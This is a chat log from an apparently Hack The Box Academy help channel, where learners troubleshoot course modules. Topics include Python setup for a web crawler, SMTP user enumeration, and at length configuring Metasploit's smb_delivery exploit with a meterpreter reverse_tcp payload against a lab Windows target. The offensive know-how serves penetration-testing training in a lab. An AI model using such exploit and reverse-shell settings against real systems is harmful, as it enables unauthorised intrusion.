#

Whatsup peoples 👋

trail shuttle
#

Maybe try everything from scratch again?

fathom pendant
#

there's also the "To install Python packages system-wide try 'pacman -S python-xyz', where xyz is the package you are trying to install"

#

i mean install scrapy with sudo

#

you goober

#

or install the package with pacman, as also stated by the message

#

reading is literally half the battle here

winged drift
#

Wondering, would this be the correct channel to post in if you would like a hint regarding a module

#

Seems like it, but just wanted to be sure

winged drift
#

Thanks, i have been trying to get through the cpts job role path by myself as much as possible but I have been stuck on 2 modules for a couple days.. currently stuck on subdomain bruteforce

fathom pendant
#

2 tips on getting the best help:
Include the module you're on, and the section
include what you've tried

#

Most people are getting through the CPTS path by themselves

#

tl;dr just get to the point of what you're stuck on and where

trail shuttle
fathom pendant
#

you can delete the externally managed file but you'd need to find it first

wraith pelican
#

might be python3-scrapy, like in apt?

fathom pendant
wraith pelican
#

good thing to do is apt search <stuff>, it will likely exists in pacman

hardy elk
#

hi, i'm doing the information gathering - web edition, i'm at the skills assessment part, there is only this questions left : What is the API key in the hidden admin directory that you have discovered on the target system? If someone can help me to answer please

trail shuttle
hardy elk
#

yeah i found /ad.......

fathom pendant
fathom pendant
#

that just prevents you from needing to add the --break-system-packages

hardy elk
trail shuttle
#

js to make sure

#

nvm i got it

#

appreciate the help marcie!

wraith pelican
#

the real command is --break-other-people-system-packages.........

winged drift
#

Hi all, on cpts information gathering web edition page 7 subdomain brute forcing.. from the wording of the question I understand that I am supposed to run a bruteforce on the already found subdomains to uncover the missing subdomains. Is that correct?

spark spruce
#

I already have completed this module (Broken Authentication) but after update I cannot check whether my answer is correct or not because old answers are already filled.
So what should I do to check my answer?

wraith pelican
winged drift
wraith pelican
#

you might want to focus on those in the course

late moth
wraith pelican
spark spruce
wraith pelican
#

I dont know. Everyone has the issue, so if it could be resolved, it would have been resolved already. check this post: #modules message

winged drift
late moth
elder matrix
#

in "The Live Engagement" of the shells and payloads module, am i forced to use parrot? can i just use my kali vm instead?

iron ibex
#

Module : Footprinting
Section : SMTP
URL : https://academy.hackthebox.com/module/112/section/1072

I don't understand what I'm supposed to do in the last question.
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

Considering :

  • The content of the course : ||Therefore, one should never entirely rely on the results of automatic tools.||
  • The absence of command other than telnet in the cheat-sheet
  • The hint : ||We recommend to use the Footprinting-wordlist provided as resource.||

I'm wondering if I am supposed to go throught the wordlist manually while typing VRFY commands ?
Any hint would be appreciated.

next bronze
distant island
#

any one solved this Creepy Crawlies
in information gathering -web addtion

elder matrix
next bronze
#

you can use any pivoting techniques you want

elder matrix
elder matrix
#

did you install scrapy first?

#

recon spider is very straightforward.. may i see the command you used to run it?

elder matrix
#

you can just copy the command and paste it here

#

no one will argue against that...especially if you delete the message afterwards

distant island
elder matrix
#

try http://

distant island
#

i want to show u the replay

elder matrix
#
python3 ReconSpider.py http://inlanefreight.com
distant island
#

still didnt work

trail shuttle
elder matrix
#

lemme check

trail shuttle
#

got scrapy installed

distant island
wraith pelican
trail shuttle
elder matrix
#

not sudo... do not use pip3 install with sudo

#

and no sudo with python scripts unless it is really needed

wraith pelican
#

change the directory you are in

distant island
elder matrix
wraith pelican
#
PermissionError: [Errno 13] Permission denied: 'results.json'

means you have not the permissions to write in the directory

elder matrix
#

yeah... run the script from /home/yourusername/Desktop

iron ibex
distant island
iron ibex
#

(Using the provided wordlist*)

elder matrix
distant island
wraith pelican
elder matrix
elder matrix
#

yeah but on the vm... did you use an iso to set up kali? or a pre-built ready to use image?

next bronze
#

it's fine to install via iso

#

but isn't this just a simple permission error

elder matrix
#

its recommended to use an image...

next bronze
#

yes but installing via iso is also fine

distant island
elder matrix
#

youre probly right butif he fiddled stuff and broke his kali.... its best to try a fresh install and just use

pip3 install scrappy

and then try again

#

or a snapshot to revert

next bronze
#

huh why do all that

#

just run it in a dir you have write perms at

elder matrix
#

hold on i thought you were troubleshooting something else.. .youre right just use the damn script from your desktop

elder matrix
trail shuttle
#

when i try to run reconspider it gave me this: No module named 'scrapy.downloadermiddlewares.offsite' is it possible to add this to the py script manually? (i do have scrapy installed)

elder matrix
#

yeah thats the eerror i want him to start fresh for

iron ibex
wraith pelican
#

should be a godwin point for troubleshooting to full reinstall

distant island
#

even oon instance gives me this

elder matrix
#

i cant help you... im sorry its too time consuming.. perhaps someone else can tackle this for you later

trail shuttle
#

atleast it did for me

elder matrix
#

yeah but i doubt it

#

oh ... okay lets hope this works for him

wraith pelican
#

it will work with break stuff but well...

trail shuttle
wraith pelican
#

if it is the pwnbiox indeed, add break packages like said above

#

if it is your box, you should learn to set up pyenv and manage your python environments

elder matrix
elder matrix
#

as absurd as it sounds... it happened.

trail shuttle
elder matrix
#

pip3 =/= pip

wraith pelican
next bronze
#
python3 -m venv temp-env
source temp-env/bin/activate
pip3 install scrapy
#

run this ^

distant island
trail shuttle
#

looks good

next bronze
#

generally if you need to use --break-system-packages, you're doing it wrong

trail shuttle
next bronze
#

exactly

#

well not temporary, I just named it that way, it's just an env, any changes you make to packages will be contained in there

trail shuttle
#

ah i see

#

that helps alot

#

appreciate it

tame urchin
#

in active directory how to know the resources(file server or web server for example) that is allowed for specific user

next bronze
#

you can check the ACL using powerview, bloodhound etc

tame urchin
#

acl of every resource or acl of the specific user?

next bronze
#

you can do both if you want, depends on what information you want to see

wary tendon
#

can someone explain why this isnt working im following the module. windows server in the windows privlige escalation module

next bronze
wary tendon
#

it shoud be my tun 0

next bronze
#

check your msf options

wraith pelican
#

and your LHOST is set to your local ip

next bronze
#

no, you check it yourself

polar palm
#

how do i find out how to hack

wraith pelican
#

ask XreOuS

polar palm
#

Xre0us tell me 🥺

next bronze
compact patrolBOT
wraith pelican
exotic solstice
#

Hi guys, I started with HTB recently and I am stuck on Getting Started module, Web enumeration module.

  1. my viurtal lab provided was missing dirb folder/tool - but I solved by just creating it from github

  2. after running gobuster dir ... it did not find /wordpress nor it exists when I try to access it via browser.

Is it possible the module / pwnmachine spawned is wrong?

fathom pendant
exotic solstice
#

yes

fathom pendant
#

the :port part is critical because the web service is not running on 80

polar palm
#

ok i like looked at the website

#

lets test my hacking skills

fathom pendant
#

but also /wordpress isn't where the answer is

polar palm
#

and got a account

exotic solstice
#

robots.txt is also missing when running gobuster

polar palm
#

/hack GoldsunJ = say no

#

huh i dont think i know how to hack

fathom pendant
fathom pendant
polar palm
#

does it tell me how to hack in rules

fathom pendant
exotic solstice
wary tendon
fathom pendant
#

you're missing: RHOST (remote Host); LHOST (your tun0)

exotic solstice
# fathom pendant restart your target

I did twice today and twice yesterday.
I restarted it again and ran nmap -sV on it first and I get Not shown: 915 filtered tcp ports (no-response), 85 closed tcp ports (reset)

fathom pendant
#

you're given a port to work with

#

whenever htb gives you an IP:PORT to work with; that's your scope to work with

#

no other ports on that host are in your scope

exotic solstice
#

Makes sense. Thanks.

wary tendon
#

im using the ip given in the practical and my tun 0

fathom pendant
#

because it's trying to bind to the remote host for SMB...which is already running

wary tendon
#

i am doing this in my kali because something is up with the module on the web

wary tendon
fathom pendant
#

reading the options tells you what each option does

#

The local host or network interface to listen on. This MUST be an address on the local machine

wary tendon
# fathom pendant

if i set the srvhost as the target and the lhost as my tun0 it does not work

#

if i set the srvhost to my kali ip it does not work

fathom pendant
#

...

#

brother

#

i want you to read the words very carefully

#

it has to be LOCAL

#

as in on the machine you're running the exploit frum

wraith pelican
#

if you are in the privesc module, section dealing with end of life systems, windows server, the example is quite explicit. under the title Obtaining a Meterpreter Shell

wary tendon
#

yea im not too sure cause every combination fails

#

without seeing whats happening its going to be hard to see whats wrong

fathom pendant
#

ok

#

let me take this one step slower

#

LHOST; tun0 -- SRVHOST; tun0

wary tendon
wraith pelican
#

that's the course

msf6 exploit(windows/smb/smb_delivery) > show options 

Module options (exploit/windows/smb/smb_delivery):
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   FILE_NAME    test.dll         no        DLL file name
   FOLDER_NAME                   no        Folder name to share (Default none)
   SHARE                         no        Share (Default Random)
   SRVHOST      10.10.14.3       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT      445              yes       The local port to listen on.
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.3       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   1   PSH
ebon nymph
#

i got cookie but after decoding via cyberchef website its still giving wrong any help

fathom pendant
ebon nymph
#

@fathom pendant module:- USING WEB PROXIES & section skill assesment

wary tendon
ebon nymph
#

skill-assesment

fathom pendant
#

the value should be 3...a

ebon nymph
#

yah i got it

fathom pendant
#

make sure no extra spaces in your answer

wary tendon
fathom pendant
#

now switch the filename to your payload you want to serve

lime magnet
#

Oh, you did that?

fathom pendant
#

my screenshto was just of the setting description

wary tendon
#

i tried almost any combination and it just gives this and does not do the next step

fathom pendant
#

¯_(ツ)_/¯

wary tendon
#

does not send stage

lime magnet
#

Are both on the same network?

fathom pendant
#

yes

lime magnet
#

(Connected to the same wifi)

wraith pelican
# wary tendon does not send stage

i see this in my notes on that section: Try to pay attention to payload x64 or x86, sessions 64 or 32 etc.
whatever that could mean.... : D

fathom pendant
ebon nymph
#

@fathom pendant thank you it was again spacing

fathom pendant
fathom pendant
ebon nymph
#

@fathom pendant ok sir

wary tendon
#

if anyone wants to watch me stream it on screen share so were on the same page that would be cool

fathom pendant
#

no

wraith pelican
#

i'm not that cool

wary tendon
#

🫤

fathom pendant
#

2 things: 1) you can't screenshare in the discord anyway; 2) that requires dming

wary tendon
#

its so much easier to see whats happening

wraith pelican
#

did you try to check what i sent you in a previous message about payloads etc

#

i guess i had the same issue

fathom pendant
#

also

#

according to your one screenshot it worked

wary tendon
#

it did not initiate the meterpreter

#

or send stage

fathom pendant
#

who said test.dll was a revshell

near hatch
wraith pelican
fathom pendant
#

from test.dll?

#

or from the payload you crafted?

#

so far he's only launching it with the test payload

#

and isn't with the crafted payload

wraith pelican
#

from test, it is in the smb delivery msf module

fathom pendant
#

ah

#

then it could be an architecture issue then

#

as you said

wary tendon
#

no edits

fathom pendant
#

set the srvhost and lhost again and try it again

#

or restart target and try it again

wary tendon
#

set it to my tun 0 which is 10.10.16.52

#

?

fathom pendant
#

yes

#

did you also run the SetExecutionPolicy command?

#

in powershell?

cloud urchin
#

your lhost looks like something that wouldn't be on htb

fathom pendant
#

so it's default

wary tendon
#

i am using my kali because something wont let me log in on the web page

#

so i used the vpn file and 10.10.16.52 is my tun 0

fathom pendant
#

did you turn off the pwnbox while using kali?

wary tendon
#

yes i just have the target active

next bronze
#

worked for me shrug

cloud urchin
#

change region try again maybe

next bronze
#

network path is not found, so the target can't reach your smb server

wraith pelican
#

you still have your LHOST to you local network

fathom pendant
#

he fixed it

next bronze
#

tbh, just copy a revshell payload over lmao

#

all this work just to get a msf shell

wraith pelican
#

did you try to change the payload to x86?

next bronze
#

the target is x64 I think

wary tendon
cloud urchin
#

payload doesn't matter if the target can't reach the host

#

@wary tendon set lhost tun0

wary tendon
#

trying to reset everything

wraith pelican
#

set payload windows/meterpreter/reverse_tcp

fathom pendant
wraith pelican
#

yeah perhaps i just guess if i have noted that about the payload it has to be for something. And i also assume the options are now set up correctly. so could be a waste of time

cloud urchin
#

if all the settings look correct, try changing regions. it wouldn't be the first time i've seen changing regions fix weird issues like this. just happened the other night with someone else.

wary tendon
#

cant log in no same issue as yesterday

#

rdp i mean

#

and remmina doesnt work

wraith pelican
wraith pelican
wary tendon
#

😦

#

i put in a ticket but they came back with instructions that i had already done

#

so i used my kali which worked up until now

opaque sonnet
#

Hey guys,
I am doing the linux privilege escalation module and stuck at this question?

#

Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.

wraith pelican
opaque sonnet
wary tendon
#

change to tcp change server locations, make sure what im putting in is correct

cloud urchin
#

that's really all there is to it

#

that should resolve any issues assuming your vm isn't configured weird. instead of simply changing servers, have you changed regions like i suggested?

next bronze
#

it worked for me so shruge

wraith pelican
old atlas
#

The "Information Gathering - Web Edition" module was updated with whole new section but some were just adjusted, in the skill assessement section I see that questions were changed but my old answer were not removed!

fathom pendant
#

just redo the questions (even though you can't submit the answer)

#

and just note down what's different

old atlas
fathom pendant
#

it's probably been submitted ad nauseum at this point lol

#

i'm sure they're trying to figure out how to do it without breaking everything

wary tendon
#

yea i dont know how to go forward i cant even get in anymore

cloud urchin
#
  1. you never answered my question i asked like 3 times. 2) we don't kno wwhat "cant get in" means. into what? your computer? your vm? the pwnbox? the victim?
wary tendon
#

into the target

cloud urchin
#

are you a troll

wary tendon
#

i changed locations as well no luck

#

no dude

cloud urchin
#

from which locations did you change from and to?

fathom pendant
#

did you redownload the new vpn pack?

wary tendon
#

if you want to see what im talking about but noone wants to let me share my screen with them

#

yes i redownloaded a new vpn

cloud urchin
#

if you had simply answered the questions, it would have been resolved 30 mins ago

fathom pendant
#

did you close the old vpn connection?

wary tendon
#

for uk to US to e

#

de

fathom pendant
#

that's not vpn region my dude

#

that's pwnbox region

#

vpn regions don't have "UK/DE"

wary tendon
#

im using US academy 5

fathom pendant
#

VPN regions are [EU/US]-academy-[1..5]

cloud urchin
#

have you changed from US vpn to an EU vpn?

wary tendon
#

i have but i will try again

#

ok im connected through my kali using openvpn and the vpn file

#

going to start target

#

spawning

#

it no connect B(

cloud urchin
#

type ip a and show the results

#

sounds like you're not on the vpn, or the correct vpn

#

when you changed regions did you download and use the new vpn file?

#

also, in your xfreerdp command you need to wrap the password in quotes because of how linux handles the special characters

next bronze
#

did you use /tls-seclevel:0

wary tendon
#

ok im in the target and this is what the base msf console looks like for smb devilery

cloud urchin
#

set lhost tun0

wary tendon
#

done

cloud urchin
#

exploit

#

you know what to do here

wary tendon
#

do i keep the 0.0.0.0 in the SRVHOST

#

or change it to my tun0

limber river
cloud urchin
#

it doesn't matter, 0.0.0.0 will make it listen on all adapters

#

you can specify just one adapter (tun0) if you want

wary tendon
cloud urchin
#

try it from the pwnbox

next bronze
#

can you even ping to your own machine from the target

wary tendon
#

i cant from pwnbox i cant connect there is something wrong with me getting in from there

wraith pelican
# next bronze did you use `/tls-seclevel:0`

I found it does not work, but if i use remmina instead if xfreerdp and set Security transport Negociation to RDP protocol security and not tls, it is able to connect to the target

next bronze
#

it worked for me for this target shruge

cloud urchin
#

could be his vm, some dumb firewall setting or something

wraith pelican
#

otherwise the smb_delivery stuff works fine

cloud urchin
#

just do it on the pwnbox to move on

next bronze
#

yeah

wary tendon
#

ill try to log in from ther one sec

next bronze
#

as I've said it's just to get a msf shell, there are a lot of other ways to do that

cloud urchin
#

maybe run msfconsole with sudo, because it can't open port 445?

fathom pendant
cloud urchin
#

meh he doesn't need rdp for this really

#

can use cme to launch everything

cloud urchin
wraith pelican
wary tendon
#

one sec the remmina info you gave worked

#

setting the lhost isnt going forward

cloud urchin
#

you need to use sudo

#

the error tells you that you don't have the permissions required to bind port 445

vagrant scroll
#

sorry to ask here, How do i access general do I need to get a role?

vagrant scroll
#

sorry

wary tendon
#

:/

#

i can go forward now thank you

#

wtf

cloud urchin
#

you need root privs to bind any port 1000 and below i think

warm portal
#

1024 and below

cloud urchin
#

thanks s1ade

wraith pelican
#

yay! congrats!

cloud urchin
#

it will work in your vm too if you use sudo with msfconsole

wraith pelican
#

after all that hussle, it is the kind of thing you will never forget

warm portal
#

it was a wild ride to watch

cloud urchin
#

his original screenshots didn't include the msfconsole command so we had limited knowledge 😛

wraith pelican
#

yeah or we all missed it : D

wary tendon
#

ok so im getting this

wraith pelican
#

nothing can stop you now!!!

wary tendon
#

its not dropping into a shell

cloud urchin
#

use a different payload

next bronze
#

nah the first shell is at 4444

warm portal
#

id look at the errors. Based on you using the default meterpreter port 4444 on your initial rundll meterpreter to get session 1, that port is now in use by that session. Two things cant use a port at once